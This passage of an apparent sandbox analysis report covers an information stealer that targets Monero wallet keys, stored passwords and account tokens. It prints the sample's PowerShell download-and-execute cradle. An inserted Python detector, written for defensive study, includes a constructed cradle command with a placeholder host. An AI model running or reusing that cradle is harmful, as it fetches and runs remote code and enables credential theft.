                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                        • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                        • API String ID: 3478931302-218353709
                        • Opcode ID: 0f3816801e094d86c69e5a0e576e4ecd6b3b15150ee03d42472797bf3f84f703
                        • Instruction ID: a829595f01a34f59a4c7279a3dcbc5a96f454a68c2b36a9ca1e705262f78e652
                        • Opcode Fuzzy Hash: 0f3816801e094d86c69e5a0e576e4ecd6b3b15150ee03d42472797bf3f84f703
                        • Instruction Fuzzy Hash: 695175B1E5015A97DB15FB60DD94FED733CAF64200F404198A64AA7084EF346B8ACBA5
                        APIs
                          • Part of subcall function 010072D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0100733A
                          • Part of subcall function 010072D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 010073B1
                          • Part of subcall function 010072D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0100740D
                          • Part of subcall function 010072D0: GetProcessHeap.KERNEL32(00000000,?), ref: 01007452
                          • Part of subcall function 010072D0: HeapFree.KERNEL32(00000000), ref: 01007459
                        • lstrcat.KERNEL32(00000000,010217FC), ref: 01007606
                        • lstrcat.KERNEL32(00000000,00000000), ref: 01007648
                        • lstrcat.KERNEL32(00000000, : ), ref: 0100765A
                        • lstrcat.KERNEL32(00000000,00000000), ref: 0100768F
                        • lstrcat.KERNEL32(00000000,01021804), ref: 010076A0
                        • lstrcat.KERNEL32(00000000,00000000), ref: 010076D3
                        • lstrcat.KERNEL32(00000000,01021808), ref: 010076ED
                        • task.LIBCPMTD ref: 010076FB
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                        • String ID: :
                        • API String ID: 2677904052-3653984579
                        • Opcode ID: f2ead8fe97bd5fb0dbc60047bef94966965c58fb90272e51e011fab813603223
                        • Instruction ID: 3b151a0d129b7c9329f75b9a72f9343c7ee4567ec3c92ccf1d339d26fea3da3d
                        • Opcode Fuzzy Hash: f2ead8fe97bd5fb0dbc60047bef94966965c58fb90272e51e011fab813603223
                        • Instruction Fuzzy Hash: 60311C79D4010ADFEB15EBE4EC98DFE7779FB98301F104119E143A7284DA34A946CB50
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0189E200,00000000,?,01020E2C,00000000,?,00000000), ref: 01018130
                        • RtlAllocateHeap.NTDLL(00000000), ref: 01018137
                        • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 01018158
                        • __aulldiv.LIBCMT ref: 01018172
                        • __aulldiv.LIBCMT ref: 01018180
                        • wsprintfA.USER32 ref: 010181AC
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                        • String ID: %d MB$@
                        • API String ID: 2774356765-3474575989
                        • Opcode ID: 17182e0337b497cdf5b07b4525ff863fd30026e8dff9f4d0d65d179115e89c0f
                        • Instruction ID: 7f4ca11ea37908840482c2216e7234b1db1a31621e9d14d607241a1276abb9a7
                        • Opcode Fuzzy Hash: 17182e0337b497cdf5b07b4525ff863fd30026e8dff9f4d0d65d179115e89c0f
                        • Instruction Fuzzy Hash: 70212EB1E44219ABDB10DFD5DC49FAEB7B8FB44B10F104609F605BB284D77869008BA5
                        APIs
                          • Part of subcall function 0101A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0101A7E6
                          • Part of subcall function 010047B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 01004839
                          • Part of subcall function 010047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 01004849
                        • InternetOpenA.WININET(01020DF7,00000001,00000000,00000000,00000000), ref: 0100610F
                        • StrCmpCA.SHLWAPI(?,0189EAC8), ref: 01006147
                        • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0100618F
                        • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 010061B3
                        • InternetReadFile.WININET(?,?,00000400,?), ref: 010061DC
                        • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0100620A
                        • CloseHandle.KERNEL32(?,?,00000400), ref: 01006249
                        • InternetCloseHandle.WININET(?), ref: 01006253
                        • InternetCloseHandle.WININET(00000000), ref: 01006260
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                        • String ID:
                        • API String ID: 2507841554-0
                        • Opcode ID: 270e2704b71ec7b864d8115443bfbf5a3c2f134b535b20a23126ab2b45d4917d
                        • Instruction ID: f983d316913c964a48c9257ae9c3b3c08f8c3d2ba88892e562372cf2a9498f9e
                        • Opcode Fuzzy Hash: 270e2704b71ec7b864d8115443bfbf5a3c2f134b535b20a23126ab2b45d4917d
                        • Instruction Fuzzy Hash: D05170B1A40219EBEB25DF50DC48BEE77B9FB44701F008098E646A71C4DB756B89CF94
                        APIs
                        • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0100733A
                        • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 010073B1
                        • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0100740D
                        • GetProcessHeap.KERNEL32(00000000,?), ref: 01007452
                        • HeapFree.KERNEL32(00000000), ref: 01007459
                        • task.LIBCPMTD ref: 01007555
                        Strings
                        Yara matches
                        Similarity
                        • API ID: Heap$EnumFreeOpenProcessValuetask
                        • String ID: Password
                        • API String ID: 775622407-3434357891
                        • Opcode ID: 8f086a12fe0abd587a35f01fb38e5cc3346980282844a0c7d35e07b3ac87e62e
                        • Instruction ID: 36f413ef9ca2f524f4176d601186246ad039490da08b02e2083d7daa0699ecba
                        • Opcode Fuzzy Hash: 8f086a12fe0abd587a35f01fb38e5cc3346980282844a0c7d35e07b3ac87e62e
                        • Instruction Fuzzy Hash: D9614DB5C001699BEB25DB50DC44BD9B7B8BF54300F0081E9E6C9A6185DFB46BC9CF90
                        APIs
                          • Part of subcall function 0101A740: lstrcpy.KERNEL32(01020E17,00000000), ref: 0101A788
                          • Part of subcall function 0101A9B0: lstrlen.KERNEL32(?,01899068,?,\Monero\wallet.keys,01020E17), ref: 0101A9C5
                          • Part of subcall function 0101A9B0: lstrcpy.KERNEL32(00000000), ref: 0101AA04
                          • Part of subcall function 0101A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0101AA12
                          • Part of subcall function 0101A920: lstrcpy.KERNEL32(00000000,?), ref: 0101A972
                          • Part of subcall function 0101A920: lstrcat.KERNEL32(00000000), ref: 0101A982
                          • Part of subcall function 0101A8A0: lstrcpy.KERNEL32(?,01020E17), ref: 0101A905
                          • Part of subcall function 0101A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0101A7E6
                        • lstrlen.KERNEL32(00000000), ref: 0100BC9F
                          • Part of subcall function 01018E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 01018E52
                        • StrStrA.SHLWAPI(00000000,AccountId), ref: 0100BCCD
                        • lstrlen.KERNEL32(00000000), ref: 0100BDA5
                        • lstrlen.KERNEL32(00000000), ref: 0100BDB9
                        Strings
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                        • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                        • API String ID: 3073930149-1079375795
                        • Opcode ID: 36786ffab44c8f0e6292a72f03d0701a5bb9bf01c6d891a1df0172c008f27992
                        • Instruction ID: e25829b5aca1dbd522dad186624f5d6c5917db71f85d2087a5658192b107ff24
                        • Opcode Fuzzy Hash: 36786ffab44c8f0e6292a72f03d0701a5bb9bf01c6d891a1df0172c008f27992
                        • Instruction Fuzzy Hash: 5AB1A176A11149DBDF14FBA0DD94EEE7339AF64210F404158F983A7098EF386E49CBA0
                        APIs
                        Strings
                        Yara matches
                        Similarity
                        • API ID: ExitProcess$DefaultLangUser
                        • String ID: *
                        • API String ID: 1494266314-163128923
                        • Opcode ID: f514d1cca8c2d2aa011100ef876457be3ccbc2d4c1fbcdeed71a595baf092273
                        • Instruction ID: 57179265e7cb2b1899184b01cc555a12acbe1316ce2e2a3aa2fe653d52b95828
                        • Opcode Fuzzy Hash: f514d1cca8c2d2aa011100ef876457be3ccbc2d4c1fbcdeed71a595baf092273
                        • Instruction Fuzzy Hash: 4CF03A34984209EFE368DFE0B90D76C7B70FB04702F040198F74B87284E6754A419B95
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 01004FCA
                        • RtlAllocateHeap.NTDLL(00000000), ref: 01004FD1
                        • InternetOpenA.WININET(01020DDF,00000000,00000000,00000000,00000000), ref: 01004FEA
                        • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 01005011
                        • InternetReadFile.WININET(?,?,00000400,00000000), ref: 01005041
                        • InternetCloseHandle.WININET(?), ref: 010050B9
                        • InternetCloseHandle.WININET(?), ref: 010050C6
                        Yara matches
                        Similarity
                        • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                        • String ID:
                        • API String ID: 3066467675-0
                        • Opcode ID: dcd846c431be055b12c7dc645588762b403df7a07b28172c7c90d7c65244c65c
                        • Instruction ID: b0a3d0907d4ae1704552d510933f6e2442744c87158757e2ffc2b3dcd21e2c72
                        • Opcode Fuzzy Hash: dcd846c431be055b12c7dc645588762b403df7a07b28172c7c90d7c65244c65c
                        • Instruction Fuzzy Hash: 22311BB4A40218ABEB24CF54DC88BDDB7B4EB48704F1081D8F60AA7284D7706EC58F98
                        APIs
                        • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 01018426
                        • wsprintfA.USER32 ref: 01018459
                        • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0101847B
                        • RegCloseKey.ADVAPI32(00000000), ref: 0101848C
                        • RegCloseKey.ADVAPI32(00000000), ref: 01018499
                          • Part of subcall function 0101A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0101A7E6
                        • RegQueryValueExA.ADVAPI32(00000000,0189E320,00000000,000F003F,?,00000400), ref: 010184EC
                        • lstrlen.KERNEL32(?), ref: 01018501
                        • RegQueryValueExA.ADVAPI32(00000000,0189E1D0,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,01020B34), ref: 01018599
                        • RegCloseKey.ADVAPI32(00000000), ref: 01018608
                        • RegCloseKey.ADVAPI32(00000000), ref: 0101861A
                        Strings
                        Yara matches
                        Similarity
                        • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                        • String ID: %s\%s
                        • API String ID: 3896182533-4073750446
                        • Opcode ID: c26e8c23a36654acf1c1f5858c72352424d57a824d8d554991a96f2ebb1e09e3
                        • Instruction ID: eff8a264892d7bd5b7cb31dd9ff89c54c9736f7aa90845de5c13d17bfbf4a365
                        • Opcode Fuzzy Hash: c26e8c23a36654acf1c1f5858c72352424d57a824d8d554991a96f2ebb1e09e3
                        • Instruction Fuzzy Hash: 05212775A40228ABEB24DB54DC84FE9B3B8FB48700F00C5D9E64AA7144DF756A85CFD4
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 010176A4
                        • RtlAllocateHeap.NTDLL(00000000), ref: 010176AB
                        • RegOpenKeyExA.ADVAPI32(80000002,0188C320,00000000,00020119,00000000), ref: 010176DD
                        • RegQueryValueExA.ADVAPI32(00000000,0189E428,00000000,00000000,?,000000FF), ref: 010176FE
                        • RegCloseKey.ADVAPI32(00000000), ref: 01017708
                        Strings
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                        • String ID: Windows 11
                        • API String ID: 3225020163-2517555085
                        • Opcode ID: f6c01c4fb536ac038345e274610e746d7ca18c20ce5ae00d4317012f77c3db0a
                        • Instruction ID: 13c65a413dbd46b8b392ca4c179bd82d4fd22ea47a6fa5431dcbde43162119c0
                        • Opcode Fuzzy Hash: f6c01c4fb536ac038345e274610e746d7ca18c20ce5ae00d4317012f77c3db0a
                        • Instruction Fuzzy Hash: 6401FFB9A80204BBE720DBE4E94DFADB7BCEB48701F104494FA4697288E67499048B50
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 01017734
                        • RtlAllocateHeap.NTDLL(00000000), ref: 0101773B
                        • RegOpenKeyExA.ADVAPI32(80000002,0188C320,00000000,00020119,010176B9), ref: 0101775B
                        • RegQueryValueExA.ADVAPI32(010176B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0101777A
                        • RegCloseKey.ADVAPI32(010176B9), ref: 01017784
                        Strings
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                        • String ID: CurrentBuildNumber
                        • API String ID: 3225020163-1022791448
                        • Opcode ID: 4d86d2c85e0ecb23da48844b16cf795e08ebd636715ed044a011fb9d8096b385
                        • Instruction ID: 2bc16563b04d85614a43a822f773e679fec8d30c36dad30de79cafd744741dd9
                        • Opcode Fuzzy Hash: 4d86d2c85e0ecb23da48844b16cf795e08ebd636715ed044a011fb9d8096b385
                        • Instruction Fuzzy Hash: 4101F4B9A40308BBE710DBE4EC4DFAEB7B8EB48705F104559FA06A7285D67456008F51
                        APIs
                        • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 010099EC
                        • GetFileSizeEx.KERNEL32(000000FF,?), ref: 01009A11
                        • LocalAlloc.KERNEL32(00000040,?), ref: 01009A31
                        • ReadFile.KERNEL32(000000FF,?,00000000,0100148F,00000000), ref: 01009A5A
                        • LocalFree.KERNEL32(0100148F), ref: 01009A90
                        • CloseHandle.KERNEL32(000000FF), ref: 01009A9A
                        Yara matches
                        Similarity
                        • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                        • String ID:
                        • API String ID: 2311089104-0
                        • Opcode ID: daf45d9e8723ca62085467f4172bffa9ecfb4e85fec9bbab20f189dc63ec9561
                        • Instruction ID: 7497f9a5d68b250620c3e4aa8355c6436260ec9b3976aa89cbf54da513d2f83c
                        • Opcode Fuzzy Hash: daf45d9e8723ca62085467f4172bffa9ecfb4e85fec9bbab20f189dc63ec9561
                        • Instruction Fuzzy Hash: F2311C74A00209EFEF25CF94D949BAE77F5FF49354F104198E906A7284D774A981CFA0
                        APIs
                        • lstrcat.KERNEL32(?,0189E488), ref: 010147DB
                          • Part of subcall function 01018DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 01018E0B
                        • lstrcat.KERNEL32(?,00000000), ref: 01014801
                        • lstrcat.KERNEL32(?,?), ref: 01014820
                        • lstrcat.KERNEL32(?,?), ref: 01014834
                        • lstrcat.KERNEL32(?,0188B5E0), ref: 01014847
                        • lstrcat.KERNEL32(?,?), ref: 0101485B
                        • lstrcat.KERNEL32(?,0189DA40), ref: 0101486F
                          • Part of subcall function 0101A740: lstrcpy.KERNEL32(01020E17,00000000), ref: 0101A788
                          • Part of subcall function 01018D90: GetFileAttributesA.KERNEL32(00000000,?,01001B54,?,?,0102564C,?,?,01020E1F), ref: 01018D9F
                          • Part of subcall function 01014570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 01014580
                          • Part of subcall function 01014570: RtlAllocateHeap.NTDLL(00000000), ref: 01014587
                          • Part of subcall function 01014570: wsprintfA.USER32 ref: 010145A6
                          • Part of subcall function 01014570: FindFirstFileA.KERNEL32(?,?), ref: 010145BD
                        Yara matches
                        Similarity
                        • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                        • String ID:
                        • API String ID: 2540262943-0
                        • Opcode ID: b15a0745166650680ed83397b023eee80b62bd3c2ac57903cfbd362296273b38
                        • Instruction ID: d3da02a9cc8176defc550873cafda86a658d4bf038145e56dd22ff97fb4b1025
                        • Opcode Fuzzy Hash: b15a0745166650680ed83397b023eee80b62bd3c2ac57903cfbd362296273b38
                        • Instruction Fuzzy Hash: AD3184B6D4021997DB20F7B0DC88EDD737CAB58704F444589F35697084EA749789CB91
                        APIs
                          • Part of subcall function 0101A740: lstrcpy.KERNEL32(01020E17,00000000), ref: 0101A788
                          • Part of subcall function 0101A9B0: lstrlen.KERNEL32(?,01899068,?,\Monero\wallet.keys,01020E17), ref: 0101A9C5
                          • Part of subcall function 0101A9B0: lstrcpy.KERNEL32(00000000), ref: 0101AA04
                          • Part of subcall function 0101A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0101AA12
                          • Part of subcall function 0101A920: lstrcpy.KERNEL32(00000000,?), ref: 0101A972
                          • Part of subcall function 0101A920: lstrcat.KERNEL32(00000000), ref: 0101A982
                          • Part of subcall function 0101A8A0: lstrcpy.KERNEL32(?,01020E17), ref: 0101A905
                        • ShellExecuteEx.SHELL32(0000003C), ref: 01012D85
                        Strings
                        • <, xrefs: 01012D39
                        • ')", xrefs: 01012CB3
                        • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 01012CC4
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 01012D04
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                        • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        • API String ID: 3031569214-898575020
                        • Opcode ID: 098959b303d95a7ab6232a9f2195db1a7395c0f3c90f1bab6b0cc724626959f1
                        • Instruction ID: 086dcf600a4438d5961088dc0ba84f8e6dbe87e70f72a80bc896d672eec62152
                        • Opcode Fuzzy Hash: 098959b303d95a7ab6232a9f2195db1a7395c0f3c90f1bab6b0cc724626959f1
                        • Instruction Fuzzy Hash: 2541FC71E01249DADB14EFA0D990FDDBB74AF24310F404019E486AB198EF782A8ACF90
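The function above assembles a PowerShell download cradle, C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -nop -c "iex(New-Object Net.WebClient).DownloadString('…')", with the URL inserted at runtime, and launches it through ShellExecuteEx. The detection logic below is an added example, not code from this report or from the sample: it runs over constructed Sysmon-style process-creation records (field names ParentImage, Image and CommandLine are assumed; the URL is a placeholder) and flags the cradle itself, the -nop/-c pair, the hard-coded SysWOW64 path and a parent executable under C:\Users. The verdict thresholds are my own choice.

```python
"""Detect the PowerShell download cradle this sample assembles
('-nop -c "iex(New-Object Net.WebClient).DownloadString(...)"', launched
via ShellExecuteEx) in process-creation telemetry.
Added example, not code from the report or the sample. The event records
are constructed Sysmon-style (Event ID 1) dictionaries, the URL is a
placeholder, and the verdict rules are my own choice."""
import re
from typing import Dict, List, Tuple

# iex / Invoke-Expression wrapped around a WebClient download; tolerant of
# spacing, an optional 'System.' prefix and DownloadString/Data/File.
CRADLE_RE = re.compile(
    r"(?:\biex\b|invoke-expression)\s*\(?\s*\(?\s*new-object\s+(?:system\.)?net\.webclient"
    r"\s*\)?\s*\.\s*download(?:string|data|file)\s*\(",
    re.IGNORECASE,
)
NOPROFILE_RE = re.compile(r"(?:^|\s)-no(?:p|profile)\b", re.IGNORECASE)
COMMAND_RE = re.compile(r"(?:^|\s)-c(?:ommand)?\b", re.IGNORECASE)
# The sample hard-codes the 32-bit PowerShell path; on a 64-bit host that is unusual for admins.
WOW64_RE = re.compile(r"\\syswow64\\windowspowershell\\", re.IGNORECASE)

# Constructed input, not from the report: one cradle launch shaped like the
# sample's strings, one scheduled-task script run, one interactive download.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {
        "ParentImage": r"C:\Users\user\Desktop\file.exe",
        "Image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r'''"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" '''
                       r'''-nop -c "iex(New-Object Net.WebClient).DownloadString('http://example.invalid/p.ps1')"''',
    },
    {
        "ParentImage": r"C:\Windows\System32\svchost.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r"powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1",
    },
    {
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r'powershell.exe -Command "Invoke-WebRequest -Uri https://example.invalid/tool.zip -OutFile C:\Temp\tool.zip"',
    },
]


def is_download_cradle(cmdline: str) -> bool:
    """True when the command line feeds a WebClient download into iex."""
    return CRADLE_RE.search(cmdline) is not None


def classify(event: Dict[str, str]) -> List[str]:
    """Return the suspicious traits of one PowerShell process-creation event."""
    image = event.get("Image", "")
    if not image.lower().endswith("powershell.exe"):
        return []
    cmd = event.get("CommandLine", "")
    reasons: List[str] = []
    if is_download_cradle(cmd):
        reasons.append("WebClient download string executed with iex")
    if NOPROFILE_RE.search(cmd) and COMMAND_RE.search(cmd):
        reasons.append("-nop combined with an inline -c command")
    if WOW64_RE.search(image):
        reasons.append("32-bit PowerShell launched from SysWOW64")
    if "\\users\\" in event.get("ParentImage", "").lower():
        reasons.append("parent executable runs from a user-writable path")
    return reasons


def verdict(event: Dict[str, str]) -> str:
    """'malicious' on a cradle, 'suspicious' when two weaker traits stack, else 'benign'."""
    reasons = classify(event)
    if any(r.startswith("WebClient") for r in reasons):
        return "malicious"
    return "suspicious" if len(reasons) >= 2 else "benign"


def scan(events: List[Dict[str, str]]) -> List[Tuple[int, str, List[str]]]:
    """Return (index, verdict, reasons) for every event that is not benign."""
    out: List[Tuple[int, str, List[str]]] = []
    for i, ev in enumerate(events):
        v = verdict(ev)
        if v != "benign":
            out.append((i, v, classify(ev)))
    return out


if __name__ == "__main__":
    for idx, v, why in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {v}: " + "; ".join(why))
```

The cradle regex is the strong signal; the other three traits are only stacked into a "suspicious" verdict because each one on its own (a -nop -c one-liner, 32-bit PowerShell, a parent under C:\Users) has legitimate uses. Because the sample builds the URL at runtime, matching on the iex/DownloadString shape rather than on a host name is what survives a change of C2.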
                        APIs
                        • LocalAlloc.KERNEL32(00000040,?), ref: 01009F41
                          • Part of subcall function 0101A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0101A7E6
                          • Part of subcall function 0101A740: lstrcpy.KERNEL32(01020E17,00000000), ref: 0101A788
                        Strings
                        Memory Dump Source
